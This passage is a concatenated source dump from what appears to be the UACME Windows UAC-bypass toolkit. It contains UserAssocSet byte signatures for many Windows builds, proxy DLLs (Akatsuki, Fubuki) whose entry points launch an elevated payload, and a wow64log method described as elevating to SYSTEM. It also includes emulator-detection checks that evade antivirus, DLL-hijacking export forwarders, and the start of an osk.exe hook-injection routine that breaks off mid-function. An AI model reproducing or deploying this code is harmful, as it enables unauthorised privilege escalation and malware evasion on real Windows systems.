* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once

//
// UserAssocSet patterns.
//

// mov r8, [rbx + 40h]
// mov rdx, [rbx + 38h]
// mov ecx, 1
// call UserAssocSet
static BYTE UserAssocSet_7601[] = {
    0x4C, 0x8B, 0x43, 0x40, 0x48, 0x8B, 0x53, 0x38, 0xB9, 0x01, 0x00, 0x00, 0x00
};

// mov r8, rsi
// mov rdx, rbx
// mov ecx, 2
// call UserAssocSet
static BYTE UserAssocSet_9600[] = {
    0x4C, 0x8B, 0xC6, 0x48, 0x8B, 0xD3, 0xB9, 0x02, 0x00, 0x00, 0x00
};

// imul rax, 4Eh
// mov ecx, 2
// add r8, rax
// call UserAssocSet
static BYTE UserAssocSet_14393[] = {
    0x48, 0x6B, 0xC0, 0x4E, 0xB9, 0x02, 0x00, 0x00, 0x00, 0x4C, 0x03, 0xC0
};

// mov r8, rsi
// mov r9d, ecx
// mov rdx, r15
// call UserAssocSet
static BYTE UserAssocSet_17763_v1554[] = {
    0x4C, 0x8B, 0xC6, 0x44, 0x8B, 0xC9, 0x49, 0x8B, 0xD7
};

// mov ecx, r9d
// mov r8, rdi
// mov rdx, rsi
// call UserAssocSet
static BYTE UserAssocSet_17763_v1728[] = {
    0x41, 0x8B, 0xC9, 0x4C, 0x8B, 0xC7, 0x48, 0x8B, 0xD6
};

// mov ecx, eax
// mov r8, rdi
// mov rdx, rbp
// call UserAssocSet
static BYTE UserAssocSet_17763_v1971[] = {
    0x44, 0x8B, 0xC8, 0x8B, 0xC8, 0x4C, 0x8B, 0xC7, 0x48, 0x8B, 0xD5
};

// mov r9d, ecx
// mov r8, rsi
// mov rdx, r15
// call UserAssocSet
static BYTE UserAssocSet_18362[] = {
    0x44, 0x8B, 0xC9, 0x4C, 0x8B, 0xC6, 0x49, 0x8B, 0xD7
};

static BYTE UserAssocSet_18362_v2[] = {
    0x4C, 0x8B, 0xC7, 0x41, 0x8B, 0xC9, 0x48, 0x8B, 0xD6
};

// mov r8, rsi
// mov r9d, ecx
// mov rdx, r15
// call UserAssocSet
static BYTE UserAssocSet_18363[] = {
    0x4C, 0x8B, 0xC6, 0x44, 0x8B, 0xC9, 0x49, 0x8B, 0xD7
};

// mov r9d, ecx
// mov r8, rsi
// mov rdx, r15
// call UserAssocSet
static BYTE UserAssocSet_19041[] = {
    0x44, 0x8B, 0xC9, 0x4C, 0x8B, 0xC6, 0x49, 0x8B, 0xD7
};

// mov r8, rdi
// mov rdx, rsi
// mov ecx, r9d
// call UserAssocSet
static BYTE UserAssocSet_19042[] = {
    0x4C, 0x8B, 0xC7, 0x48, 0x8B, 0xD6, 0x41, 0x8B, 0xC9
};

// mov r8, rdi
// mov rdx, rbp
// mov ecx, eax
// call UserAssocSet
static BYTE UserAssocSet_19043_v1023[] = {
    0x4C, 0x8B, 0xC7, 0x48, 0x8B, 0xD5, 0x8B, 0xC8
};

// mov r8, rsi
// mov rdx, r14
// mov ecx, eax          (8B C8)
// call UserAssocSet
static BYTE UserAssocSet_22000[] = {
    0x4C, 0x8B, 0xC6, 0x49, 0x8B, 0xD6, 0x8B, 0xC8
};

// mov r9d, ecx
// mov r8, rdi
// mov rdx, r14
// call UserAssocSet
static BYTE UserAssocSet_22621[] = {
    0x44, 0x8B, 0xC9, 0x4C, 0x8B, 0xC7, 0x49, 0x8B, 0xD6
};

// mov r8, rsi
// mov rdx, r15
// lea ecx, [r9 + 2]
// call UserAssocSet
static BYTE UserAssocSet_26100[] = {
    0x4C, 0x8B, 0xC6, 0x49, 0x8B, 0xD7, 0x41, 0x8D, 0x49, 0x02
};

//
// End of UserAssocSet patterns.
//

//
// Windows 7 SP1 7601
//
USER_ASSOC_PATTERN UAS_7601 = { UserAssocSet_7601, sizeof(UserAssocSet_7601) };
PVOID UAS_PATTERN_TABLE_7601[] = { &UAS_7601 };
USER_ASSOC_SIGNATURE UAS_SIG_7601 = {
    NT_WIN7_SP1, NT_WIN7_SP1, RTL_NUMBER_OF(UAS_PATTERN_TABLE_7601), &UAS_PATTERN_TABLE_7601
};

//
// Windows 8 (9600)
//
USER_ASSOC_PATTERN UAS_9600 = { UserAssocSet_9600, sizeof(UserAssocSet_9600) };
PVOID UAS_PATTERN_TABLE_9600[] = { &UAS_9600 };
USER_ASSOC_SIGNATURE UAS_SIG_9600 = {
    NT_WIN8_BLUE, NT_WIN8_BLUE, RTL_NUMBER_OF(UAS_PATTERN_TABLE_9600), &UAS_PATTERN_TABLE_9600
};

//
// Windows 10 1607 (14393)
//
USER_ASSOC_PATTERN UAS_14393 = { UserAssocSet_14393, sizeof(UserAssocSet_14393) };
PVOID UAS_PATTERN_TABLE_14393[] = { &UAS_14393 };
USER_ASSOC_SIGNATURE UAS_SIG_14393 = {
    NT_WIN10_REDSTONE1, NT_WIN10_REDSTONE1, RTL_NUMBER_OF(UAS_PATTERN_TABLE_14393), &UAS_PATTERN_TABLE_14393
};

//
// Windows 10 1809 (17763)
//
USER_ASSOC_PATTERN UAS_17763_1554 = { UserAssocSet_17763_v1554, sizeof(UserAssocSet_17763_v1554) };
USER_ASSOC_PATTERN UAS_17763_1728 = { UserAssocSet_17763_v1728, sizeof(UserAssocSet_17763_v1728) };
USER_ASSOC_PATTERN UAS_17763_1971 = { UserAssocSet_17763_v1971, sizeof(UserAssocSet_17763_v1971) };
PVOID UAS_PATTERN_TABLE_17763[] = { &UAS_17763_1554, &UAS_17763_1728, &UAS_17763_1971 };
USER_ASSOC_SIGNATURE UAS_SIG_17763 = {
    NT_WIN10_REDSTONE5, NT_WIN10_REDSTONE5, RTL_NUMBER_OF(UAS_PATTERN_TABLE_17763), &UAS_PATTERN_TABLE_17763
};

//
// Windows 10 1903 (18362)
//
USER_ASSOC_PATTERN
UAS_18362 = { UserAssocSet_18362, sizeof(UserAssocSet_18362) }; USER_ASSOC_PATTERN UAS_18362_1350 = { UserAssocSet_18362_v2, sizeof(UserAssocSet_18362_v2) }; PVOID UAS_PATTERN_TABLE_18362[] = { &UAS_18362, &UAS_18362_1350 }; USER_ASSOC_SIGNATURE UAS_SIG_18362 = { NT_WIN10_19H1, NT_WIN10_19H1, RTL_NUMBER_OF(UAS_PATTERN_TABLE_18362), &UAS_PATTERN_TABLE_18362 }; // // Windows 10 1909 (18363) // USER_ASSOC_PATTERN UAS_18363 = { UserAssocSet_18363, sizeof(UserAssocSet_18363) }; PVOID UAS_PATTERN_TABLE_18363[] = { &UAS_18363, &UAS_18362_1350 }; USER_ASSOC_SIGNATURE UAS_SIG_18363 = { NT_WIN10_19H2, NT_WIN10_19H2, RTL_NUMBER_OF(UAS_PATTERN_TABLE_18363), &UAS_PATTERN_TABLE_18363 }; // // Windows 10 2004 (19041) // USER_ASSOC_PATTERN UAS_19041 = { UserAssocSet_19041, sizeof(UserAssocSet_19041) }; USER_ASSOC_PATTERN UAS_19042_789 = { UserAssocSet_19042, sizeof(UserAssocSet_19042) }; //same as for 19042 PVOID UAS_PATTERN_TABLE_19041[] = { &UAS_19041, &UAS_19042_789 }; USER_ASSOC_SIGNATURE UAS_SIG_19041 = { NT_WIN10_20H1, NT_WIN10_20H1, RTL_NUMBER_OF(UAS_PATTERN_TABLE_19041), &UAS_PATTERN_TABLE_19041 }; // // Windows 10 2009 (19042/19043/19044) // USER_ASSOC_PATTERN UAS_19043 = { UserAssocSet_19043_v1023, sizeof(UserAssocSet_19043_v1023) }; PVOID UAS_PATTERN_TABLE_19042_19043[] = { &UAS_19042_789, &UAS_19043 }; USER_ASSOC_SIGNATURE UAS_SIG_19042_19043 = { NT_WIN10_20H2, NT_WIN10_21H2, RTL_NUMBER_OF(UAS_PATTERN_TABLE_19042_19043), &UAS_PATTERN_TABLE_19042_19043 }; // Windows 11 21H2 (22000) USER_ASSOC_PATTERN UAS_22000 = { UserAssocSet_22000, sizeof(UserAssocSet_22000) }; PVOID UAS_PATTERN_TABLE_22000[] = { &UAS_22000 }; USER_ASSOC_SIGNATURE UAS_SIG_22000 = { NT_WIN11_21H2 , NT_WIN11_21H2, RTL_NUMBER_OF(UAS_PATTERN_TABLE_22000), &UAS_PATTERN_TABLE_22000 }; // // Windows 11 22H2-23H2 (22621/22631) // USER_ASSOC_PATTERN UAS_22621 = { UserAssocSet_22621, sizeof(UserAssocSet_22621) }; PVOID UAS_PATTERN_TABLE_22621[] = { &UAS_22621 }; USER_ASSOC_SIGNATURE UAS_SIG_22621 = { 
NT_WIN11_22H2, NT_WIN11_23H2, RTL_NUMBER_OF(UAS_PATTERN_TABLE_22621), &UAS_PATTERN_TABLE_22621 }; // // Windows 11 24H2 (26100+) // USER_ASSOC_PATTERN UAS_26100 = { UserAssocSet_26100, sizeof(UserAssocSet_26100) }; PVOID UAS_PATTERN_TABLE_26100[] = { &UAS_26100 }; USER_ASSOC_SIGNATURE UAS_SIG_26100 = { NT_WIN11_24H2, NT_WIN11_24H2, RTL_NUMBER_OF(UAS_PATTERN_TABLE_26100), &UAS_PATTERN_TABLE_26100 }; ================================================ FILE: Source/Akatsuki/Akatsuki.vcxproj ================================================  Debug x64 ReleaseInternal x64 Release x64 {07EF7652-1C2D-478B-BB4B-F9560695A387} Win32Proj Akatsuki 10.0 DynamicLibrary true v145 Unicode false DynamicLibrary false v145 true Unicode false DynamicLibrary false v145 true Unicode false true .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ $(ProjectName)64 SecurityRules.ruleset false false .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ $(ProjectName)64 false AllRules.ruleset false .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ $(ProjectName)64 false SecurityRules.ruleset Level4 Disabled _DEBUG;_WINDOWS;_USRDLL;AKATSUKI_EXPORTS;%(PreprocessorDefinitions) CompileAsC $(SolutionDir) Windows true DllMain 6.0 export.def Level4 MaxSpeed true true NDEBUG;_WINDOWS;_USRDLL;AKATSUKI_EXPORTS;%(PreprocessorDefinitions) false CompileAsC $(SolutionDir) Windows true true false DllMain true 6.0 export.def Level4 MaxSpeed true true NDEBUG;_WINDOWS;_USRDLL;AKATSUKI_EXPORTS;%(PreprocessorDefinitions) false CompileAsC $(SolutionDir) Windows true true false DllMain true 6.0 export.def \Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Akatsuki64.dll ================================================ FILE: Source/Akatsuki/Akatsuki.vcxproj.filters ================================================  {4FC737F1-C7A5-4376-A066-2A32D752A2FF} cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx {93995380-89BD-4b04-88EB-625FBE52EBFB} 
================================================
FILE: Source/Akatsuki/Akatsuki.vcxproj.user
================================================

================================================
FILE: Source/Akatsuki/dllmain.c
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2016 - 2022
*
*  TITLE:       DLLMAIN.C
*
*  VERSION:     3.61
*
*  DATE:        22 Jun 2022
*
*  Proxy dll entry point, Akatsuki.
*  Special dll for wow64 logger method.
*
*  WARNING: real wow64log must have native subsystem and only ntdll export.
*  This one will force crash and propagate to WER process elevating to NTAuthority/System.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/

#if !defined UNICODE
#error ANSI build is not supported
#endif

#include "shared\shared.h"
#include "shared\libinc.h"

#define LoadedMsg      TEXT("Akatsuki lock and loaded")

HANDLE g_SyncMutant = NULL;
UACME_PARAM_BLOCK g_SharedParams;

/*
* DummyFunc
*
* Purpose:
*
* Stub for fake exports.
*
*/
VOID WINAPI DummyFunc(
    VOID
)
{
}

/*
* DbgDumpRuntimeInfo
*
* Purpose:
*
* Dump runtime info to the file, this routine is only for debug builds.
*
*/
VOID DbgDumpRuntimeInfo()
{
    HANDLE hFile = INVALID_HANDLE_VALUE;
    WCHAR szReportName[MAX_PATH * 2];
    WCHAR sysdir[MAX_PATH + 1];
    DWORD cch;
    LPWSTR lpText = NULL;
    DWORD bytesIO;
    WCHAR ch;

    cch = ucmExpandEnvironmentStrings(L"%temp%\\", sysdir, MAX_PATH);
    if ((cch != 0) && (cch < MAX_PATH)) {
        _strcpy(szReportName, sysdir);
        _strcat(szReportName, TEXT("report_"));
        ultostr(GetCurrentProcessId(), _strend(szReportName));
        _strcat(szReportName, TEXT(".txt"));

        hFile = CreateFile(szReportName, GENERIC_ALL, 0, NULL, CREATE_ALWAYS, 0, NULL);
        if (hFile != INVALID_HANDLE_VALUE) {
            // UTF-16 LE byte order mark, then the report text.
            ch = (WCHAR)0xFEFF;
            WriteFile(hFile, &ch, sizeof(WCHAR), &bytesIO, NULL);
            lpText = ucmQueryRuntimeInfo(TRUE);
            if (lpText) {
                WriteFile(hFile, lpText, (DWORD)(_strlen(lpText) * sizeof(WCHAR)), &bytesIO, NULL);
                ucmDestroyRuntimeInfo(lpText);
            }
            CloseHandle(hFile);
        }
    }
}

#define Hash_CreateProcessAsUserW 0xb75be93c

/*
* InitFunctionPtr
*
* Purpose:
*
* Retrieve required function ptr.
*
*/
PVOID InitFunctionPtr(
    VOID
)
{
    UNICODE_STRING usKernel = RTL_CONSTANT_STRING(L"kernel32.dll");
    UNICODE_STRING usAdvapi = RTL_CONSTANT_STRING(L"advapi32.dll");
    NTSTATUS ntStatus;
    PVOID ImageBase = NULL, dummy;

    ntStatus = LdrLoadDll(NULL, NULL, &usKernel, &dummy);
    if (NT_SUCCESS(ntStatus)) {

        ntStatus = LdrGetDllHandleEx(LDR_GET_DLL_HANDLE_EX_UNCHANGED_REFCOUNT,
            NULL, NULL, &usAdvapi, &ImageBase);

        if (!NT_SUCCESS(ntStatus)) {
            ntStatus = LdrLoadDll(NULL, NULL, &usAdvapi, &ImageBase);
        }

        if (NT_SUCCESS(ntStatus)) {
            return ucmGetProcedureAddressByHash(ImageBase, Hash_CreateProcessAsUserW);
        }
    }

    return NULL;
}

/*
* DefaultPayload
*
* Purpose:
*
* Process parameter if present or start cmd.exe and exit immediately.
*
*/
VOID DefaultPayload(
    VOID
)
{
    BOOL bSharedParamsReadOk;
    UINT ExitCode = 0;
    PWSTR lpParameter;
    ULONG cbParameter;
    BOOL bIsLocalSystem = FALSE;
    ULONG SessionId;
    PFNCREATEPROCESSASUSERW pCreateProcessAsUser;

    if (!NT_SUCCESS(ucmCreateSyncMutant(&g_SyncMutant))) {
        RtlExitUserProcess(STATUS_SUCCESS);
        return;
    }

    //
    // Read shared params block.
    //
    RtlSecureZeroMemory(&g_SharedParams, sizeof(g_SharedParams));
    bSharedParamsReadOk = ucmReadSharedParameters(&g_SharedParams);
    if (bSharedParamsReadOk) {
        lpParameter = g_SharedParams.szParameter;
        cbParameter = (ULONG)(_strlen(g_SharedParams.szParameter) * sizeof(WCHAR));
        SessionId = g_SharedParams.SessionId;
    }
    else {
        lpParameter = NULL;
        cbParameter = 0UL;
        SessionId = 0;
    }

    ucmIsLocalSystem(&bIsLocalSystem);

    pCreateProcessAsUser = (PFNCREATEPROCESSASUSERW)InitFunctionPtr();
    if (pCreateProcessAsUser) {
        ExitCode = (ucmLaunchPayload2(
            pCreateProcessAsUser,
            bIsLocalSystem,
            SessionId,
            lpParameter,
            cbParameter) != FALSE);
    }

    //
    // Notify Akagi.
    //
    if (bSharedParamsReadOk) {
        ucmSetCompletion(g_SharedParams.szSignalObject);
    }

    ucmSleep(5000);
    NtClose(g_SyncMutant);
    RtlExitUserProcess(ExitCode);
}

/*
* DllMain
*
* Purpose:
*
* Proxy dll entry point.
*
*/
BOOL WINAPI DllMain(
    _In_ HINSTANCE hinstDLL,
    _In_ DWORD fdwReason,
    _In_ LPVOID lpvReserved
)
{
    UNREFERENCED_PARAMETER(hinstDLL);
    UNREFERENCED_PARAMETER(lpvReserved);

    ucmDbgMsg(LoadedMsg);

    if (wdIsEmulatorPresent() == STATUS_NEEDS_REMEDIATION)
        RtlExitUserProcess('Foff');

    if (fdwReason == DLL_PROCESS_ATTACH) {
        LdrDisableThreadCalloutsForDll(hinstDLL);
        DefaultPayload();
    }

    return TRUE;
}

/*
* EntryPointExeMode
*
* Purpose:
*
* Entry point to be used in exe mode.
*
*/
VOID WINAPI EntryPointExeMode(
    VOID
)
{
    BOOL IsDll = RtlImageNtHeader(GetModuleHandle(NULL))->FileHeader.Characteristics & IMAGE_FILE_DLL;

    if (!IsDll) {
        if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {
            RtlExitUserProcess('foff');
        }
        DefaultPayload();
    }
}

================================================
FILE: Source/Akatsuki/export.def
================================================
EXPORTS
    Wow64LogSystemService = DummyFunc
    Wow64LogInitialize = DummyFunc
    Wow64LogTerminate = DummyFunc
    Wow64LogMessageArgList = EntryPointExeMode

================================================
FILE: Source/Akatsuki/resource.h
================================================
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by version.rc

// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE        101
#define _APS_NEXT_COMMAND_VALUE         40001
#define _APS_NEXT_CONTROL_VALUE         1001
#define _APS_NEXT_SYMED_VALUE           101
#endif
#endif

================================================
FILE: Source/Fubuki/atldll.h
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2023
*
*  TITLE:       ATLDLL.H
*
*  VERSION:     3.64
*
*  DATE:        04 Feb 2023
*
*  ATL forwarded import.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/

#pragma once

#pragma comment(linker, " /EXPORT:AtlAdvise=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlAdvise,@10")
#pragma comment(linker, " /EXPORT:AtlAxAttachControl=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlAxAttachControl,@41")
#pragma comment(linker, " /EXPORT:AtlAxCreateControl=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlAxCreateControl,@39")
#pragma comment(linker, " /EXPORT:AtlAxCreateControlEx=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlAxCreateControlEx,@40")
#pragma comment(linker, " /EXPORT:AtlAxCreateDialogA=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlAxCreateDialogA,@38")
#pragma comment(linker, " /EXPORT:AtlAxCreateDialogW=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlAxCreateDialogW,@37")
#pragma comment(linker, " /EXPORT:AtlAxDialogBoxA=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlAxDialogBoxA,@36")
#pragma comment(linker, " /EXPORT:AtlAxDialogBoxW=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlAxDialogBoxW,@35")
#pragma comment(linker, " /EXPORT:AtlAxGetControl=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlAxGetControl,@47")
#pragma comment(linker, " /EXPORT:AtlAxGetHost=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlAxGetHost,@48")
#pragma comment(linker, " /EXPORT:AtlAxWinInit=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlAxWinInit,@42")
#pragma comment(linker, " /EXPORT:AtlComPtrAssign=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlComPtrAssign,@30")
#pragma comment(linker, " /EXPORT:AtlComQIPtrAssign=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlComQIPtrAssign,@31")
#pragma comment(linker, " /EXPORT:AtlCreateTargetDC=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlCreateTargetDC,@26")
#pragma comment(linker, " /EXPORT:AtlDevModeW2A=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlDevModeW2A,@29")
#pragma comment(linker, " /EXPORT:AtlFreeMarshalStream=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlFreeMarshalStream,@12")
#pragma comment(linker, " /EXPORT:AtlGetObjectSourceInterface=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlGetObjectSourceInterface,@54")
#pragma comment(linker, " /EXPORT:AtlGetVersion=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlGetVersion,@34")
#pragma comment(linker, " /EXPORT:AtlHiMetricToPixel=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlHiMetricToPixel,@27")
#pragma comment(linker, " /EXPORT:AtlIPersistPropertyBag_Load=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlIPersistPropertyBag_Load,@52")
#pragma comment(linker, " /EXPORT:AtlIPersistPropertyBag_Save=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlIPersistPropertyBag_Save,@53")
#pragma comment(linker, " /EXPORT:AtlIPersistStreamInit_GetSizeMax=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlIPersistStreamInit_GetSizeMax,@60")
#pragma comment(linker, " /EXPORT:AtlIPersistStreamInit_Load=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlIPersistStreamInit_Load,@50")
#pragma comment(linker, " /EXPORT:AtlIPersistStreamInit_Save=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlIPersistStreamInit_Save,@51")
#pragma comment(linker, " /EXPORT:AtlInternalQueryInterface=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlInternalQueryInterface,@32")
#pragma comment(linker, " /EXPORT:AtlMarshalPtrInProc=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlMarshalPtrInProc,@13")
#pragma comment(linker, " /EXPORT:AtlModuleAddCreateWndData=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleAddCreateWndData,@43")
#pragma comment(linker, " /EXPORT:AtlModuleAddTermFunc=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleAddTermFunc,@58")
#pragma comment(linker, " /EXPORT:AtlModuleExtractCreateWndData=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleExtractCreateWndData,@44")
#pragma comment(linker, " /EXPORT:AtlModuleGetClassObject=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleGetClassObject,@15")
#pragma comment(linker, " /EXPORT:AtlModuleInit=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleInit,@16")
#pragma comment(linker, " /EXPORT:AtlModuleLoadTypeLib=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleLoadTypeLib,@56")
#pragma comment(linker, " /EXPORT:AtlModuleRegisterClassObjects=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleRegisterClassObjects,@17")
#pragma comment(linker, " /EXPORT:AtlModuleRegisterServer=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleRegisterServer,@18")
#pragma comment(linker, " /EXPORT:AtlModuleRegisterTypeLib=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleRegisterTypeLib,@19")
#pragma comment(linker, " /EXPORT:AtlModuleRegisterWndClassInfoA=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleRegisterWndClassInfoA,@46")
#pragma comment(linker, " /EXPORT:AtlModuleRegisterWndClassInfoW=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleRegisterWndClassInfoW,@45")
#pragma comment(linker, " /EXPORT:AtlModuleRevokeClassObjects=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleRevokeClassObjects,@20")
#pragma comment(linker, " /EXPORT:AtlModuleTerm=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleTerm,@21")
#pragma comment(linker, " /EXPORT:AtlModuleUnRegisterTypeLib=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleUnRegisterTypeLib,@55")
#pragma comment(linker, " /EXPORT:AtlModuleUnregisterServer=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleUnregisterServer,@22")
#pragma comment(linker, " /EXPORT:AtlModuleUnregisterServerEx=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleUnregisterServerEx,@57")
#pragma comment(linker, " /EXPORT:AtlModuleUpdateRegistryFromResourceD=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlModuleUpdateRegistryFromResourceD,@23")
#pragma comment(linker, " /EXPORT:AtlPixelToHiMetric=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlPixelToHiMetric,@28")
#pragma comment(linker, " /EXPORT:AtlRegisterClassCategoriesHelper=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlRegisterClassCategoriesHelper,@49")
#pragma comment(linker, " /EXPORT:AtlSetErrorInfo=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlSetErrorInfo,@25")
#pragma comment(linker, " /EXPORT:AtlSetErrorInfo2=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlSetErrorInfo2,@59")
#pragma comment(linker, " /EXPORT:AtlUnadvise=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlUnadvise,@11")
#pragma comment(linker, " /EXPORT:AtlUnmarshalPtr=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlUnmarshalPtr,@14")
#pragma comment(linker, " /EXPORT:AtlWaitWithMessageLoop=\\\\?\\globalroot\\systemroot\\system32\\atl.AtlWaitWithMessageLoop,@24")

================================================
FILE: Source/Fubuki/dll.vcxproj
================================================
================================================
FILE: Source/Fubuki/dll.vcxproj.filters
================================================

================================================
FILE: Source/Fubuki/dll.vcxproj.user
================================================

================================================
FILE: Source/Fubuki/dllmain.c
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2014 - 2025
*
*  TITLE:       DLLMAIN.C
*
*  VERSION:     3.69
*
*  DATE:        07 Jul 2025
*
*  Proxy dll entry point.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/

#include "fubuki.h"

UACME_PARAM_BLOCK g_SharedParams;
HANDLE g_SyncMutant = NULL;

/*
* DummyFunc
*
* Purpose:
*
* Stub for fake exports.
*
*/
VOID WINAPI DummyFunc(
    VOID
)
{
}

/*
* DefaultPayload
*
* Purpose:
*
* Process parameter if present or start cmd.exe and exit immediately.
*
*/
VOID DefaultPayload(
    VOID
)
{
    BOOL bSharedParamsReadOk;
    UINT ExitCode;
    PWSTR lpParameter;
    ULONG cbParameter;

    ucmDbgMsg(LoadedMsg);

    //
    // Read shared params block.
    //
    RtlSecureZeroMemory(&g_SharedParams, sizeof(g_SharedParams));
    bSharedParamsReadOk = ucmReadSharedParameters(&g_SharedParams);
    if (bSharedParamsReadOk) {
        ucmDbgMsg(L"Fubuki, ucmReadSharedParameters OK\r\n");
        lpParameter = g_SharedParams.szParameter;
        cbParameter = (ULONG)(_strlen(g_SharedParams.szParameter) * sizeof(WCHAR));
    }
    else {
        ucmDbgMsg(L"Fubuki, ucmReadSharedParameters Failed\r\n");
        lpParameter = NULL;
        cbParameter = 0UL;
    }

    ucmDbgMsg(L"Fubuki, before ucmLaunchPayload\r\n");
    ExitCode = (ucmLaunchPayload(lpParameter, cbParameter) != FALSE);
    ucmDbgMsg(L"Fubuki, after ucmLaunchPayload\r\n");

    if (ExitCode == 0) {
        ucmDbgMsg(L"Fubuki, ucmLaunchPayload failed\r\n");
    }

    //
    // If this is default executable, show runtime info.
    //
    if ((lpParameter == NULL) || (cbParameter == 0)) {
        if (g_SharedParams.AkagiFlag == AKAGI_FLAG_TANGO)
            ucmQueryRuntimeInfo(FALSE);
    }

    //
    // Notify Akagi.
    //
    if (bSharedParamsReadOk) {
        ucmDbgMsg(L"Fubuki, completion\r\n");
        ucmSetCompletion(g_SharedParams.szSignalObject);
    }

    RtlExitUserProcess(ExitCode);
}

/*
* UiAccessMethodHookProc
*
* Purpose:
*
* Window hook procedure for UiAccessMethod
*
*/
LRESULT CALLBACK UiAccessMethodHookProc(
    _In_ int nCode,
    _In_ WPARAM wParam,
    _In_ LPARAM lParam
)
{
    return CallNextHookEx(NULL, nCode, wParam, lParam);
}

/*
* UiAccessMethodPayload
*
* Purpose:
*
* Defines application context and either:
*  - if fInstallHook set - installs windows hook for dll injection
*  - run default payload in target app context
*
*/
VOID UiAccessMethodPayload(
    _In_ HINSTANCE hinstDLL,
    _In_ BOOL fInstallHook,
    _In_opt_ LPWSTR lpTargetApp
)
{
    LPWSTR lpFileName;
    HHOOK hHook;
    HOOKPROC HookProcedure;
    TOKEN_ELEVATION_TYPE TokenType = TokenElevationTypeDefault;
    WCHAR szModuleName[MAX_PATH + 1];

    RtlSecureZeroMemory(szModuleName, sizeof(szModuleName));
    if (GetModuleFileName(NULL, szModuleName, MAX_PATH) == 0)
        return;

    lpFileName = _filename(szModuleName);
    if (lpFileName == NULL)
        return;

    if (fInstallHook) {

        //
        // Check if we are in the required application context
        // Are we inside osk.exe?
        //
        if (_strcmpi(lpFileName, TEXT("osk.exe")) == 0) {

            HookProcedure = (HOOKPROC)GetProcAddress(hinstDLL, FUBUKI_WND_HOOKPROC); //UiAccessMethodHookProc
            if (HookProcedure) {
